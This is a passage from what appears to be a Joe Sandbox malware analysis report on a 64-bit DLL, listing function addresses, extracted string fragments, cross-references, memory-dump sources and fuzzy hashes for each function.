kWa^, xrefs: 0000000180028B78

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;$36H$Yfr4$kWa^
API String ID: 0-3599472112
Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007AF0 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

bN, xrefs: 0000000180007BF0
u, xrefs: 0000000180007AFC
?M, xrefs: 0000000180007B48
B , xrefs: 0000000180007C10

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?M$B $bN$u
API String ID: 0-4267052880
Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800264F8 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

(, xrefs: 0000000180026CE0
U, xrefs: 0000000180026E54
wU, xrefs: 0000000180026E3F

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ($U$wU
API String ID: 0-2031152664
Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016464 Relevance: 4.1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

U, xrefs: 0000000180016ACA
y, xrefs: 0000000180016AAA
!d.#, xrefs: 00000001800165F6

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: y$!d.#$U
API String ID: 0-1702114524
Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027EA4 Relevance: 4.0, Strings: 3, Instructions: 253COMMON

Download Yara Rule

Strings

bVZ, xrefs: 0000000180028141
V, xrefs: 0000000180027F18
o(, xrefs: 0000000180027F9A

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: V$bVZ$o(
API String ID: 0-1660054416
Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000569C Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

LI, xrefs: 000000018000575A
K#, xrefs: 00000001800058C8
cn , xrefs: 000000018000573A

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: K#$LI$cn
API String ID: 0-3773415493
Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025D84 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

$e, xrefs: 0000000180025EB9
^F, xrefs: 0000000180025DC4
Is, xrefs: 0000000180025DCC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $e$Is$^F
API String ID: 0-4110932142
Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B520 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

j , xrefs: 000000018001B572
O, xrefs: 000000018001B6B8
[_K&, xrefs: 000000018001B6AA

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: O$[_K&$j
API String ID: 0-2002151384
Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006650 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

WT, xrefs: 0000000180006817
-h, xrefs: 0000000180006672
>"I, xrefs: 000000018000683A

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -h$WT$>"I
API String ID: 0-2979910649
Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029124 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

34, xrefs: 0000000180029346
I$s, xrefs: 000000018002916E
-, xrefs: 0000000180029367

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 34$I$s$-
API String ID: 0-2987712878
Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C1DC Relevance: 3.8, Strings: 3, Instructions: 88COMMON

Download Yara Rule

Strings

>, xrefs: 000000018001C204
p, xrefs: 000000018001C1F6
Da, xrefs: 000000018001C1FD

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >$Da$p
API String ID: 0-3088490888
Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800159A0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

%i, xrefs: 0000000180015AC7
o, xrefs: 0000000180015A11
J_d, xrefs: 00000001800159D3

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %i$J_d$o
API String ID: 0-2302849290
Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1E0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

~!, xrefs: 000000018000D9DC
z, xrefs: 000000018000D9A8
%.&, xrefs: 000000018000D945

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %.&$~!$z
API String ID: 0-3431779881
Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B8D0 Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

p7, xrefs: 000000018000B8E3
ie, xrefs: 000000018000B9A8
Ks, xrefs: 000000018000B90F

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Ks$ie$p7
API String ID: 0-1618259084
Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B898 Relevance: 3.8, Strings: 3, Instructions: 64COMMON

Download Yara Rule

Strings

}j, xrefs: 000000018001B917
N=?S, xrefs: 000000018001B907
v, xrefs: 000000018001B8B4

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: N=?S$v$}j
API String ID: 0-4092938293
Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800198DC Relevance: 3.8, Strings: 3, Instructions: 55COMMON

Download Yara Rule

Strings

2`, xrefs: 00000001800198E0
WFY, xrefs: 0000000180019901
XS, xrefs: 00000001800199A3

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2`$XS$WFY
API String ID: 0-4220438673
Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09501910 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFA09501B5F
RaiseException.KERNEL32 ref: 00007FFA09501B70

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction ID: 5c3df16d2cbb7616f79db860d8c6136ddf9e19521205a7d13717786910946b8f
Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction Fuzzy Hash: EEB15C73604B848BEB15CF2AD88236C77A4F789B48F18C926DB5D877A4CB39E855C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09509410 Relevance: 3.1, APIs: 2, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32 ref: 00007FFA09509465

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
Instruction ID: 24fb28b54c109230beeb16568d68cbc8b278b2aa02f033fd1a869349d5338415
Opcode Fuzzy Hash: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
Instruction Fuzzy Hash: A1212F3260CB4586DB50CF66F49172AB7A4F7CA794F008125EACD83B69DF7DE4498B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010954 Relevance: 2.9, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

d9(4, xrefs: 00000001800109F6
Y6}, xrefs: 0000000180010ADE

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Y6}$d9(4
API String ID: 0-3330832364
Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001308C Relevance: 2.8, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

LPX, xrefs: 0000000180013275
?T~, xrefs: 00000001800132DA

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?T~$LPX
API String ID: 0-3819494200
Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023D28 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

lqCn, xrefs: 0000000180023E96
m[l, xrefs: 0000000180023E02

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: lqCn$m[l
API String ID: 0-3128696216
Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800110AC Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

Nt, xrefs: 0000000180011290
U, xrefs: 00000001800113BA

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Nt$U
API String ID: 0-2773090818
Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BA24 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

5t%, xrefs: 000000018000BA9E
y, xrefs: 000000018000BC4B

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5t%$y
API String ID: 0-493594994
Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800096B8 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

1e, xrefs: 00000001800096D8
f<$F, xrefs: 0000000180009875

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1e$f<$F
API String ID: 0-2724976541
Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800084F8 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

L, xrefs: 00000001800086D6
Y", xrefs: 000000018000860B

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L$Y"
API String ID: 0-1467774553
Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024680 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

y&, xrefs: 00000001800246FF
Sa, xrefs: 00000001800283E3

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Sa$y&
API String ID: 0-700414750
Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028690 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

, N, xrefs: 00000001800287E1
0gL, xrefs: 000000018002880D

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: , N$0gL
API String ID: 0-3996470819
Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800148B0 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

G`OV, xrefs: 0000000180014A14
1/, xrefs: 000000018001498D

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1/$G`OV
API String ID: 0-3929948944
Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

oB#x, xrefs: 0000000180001159
ANSk, xrefs: 000000018000109F

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ANSk$oB#x
API String ID: 0-2811520726
Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
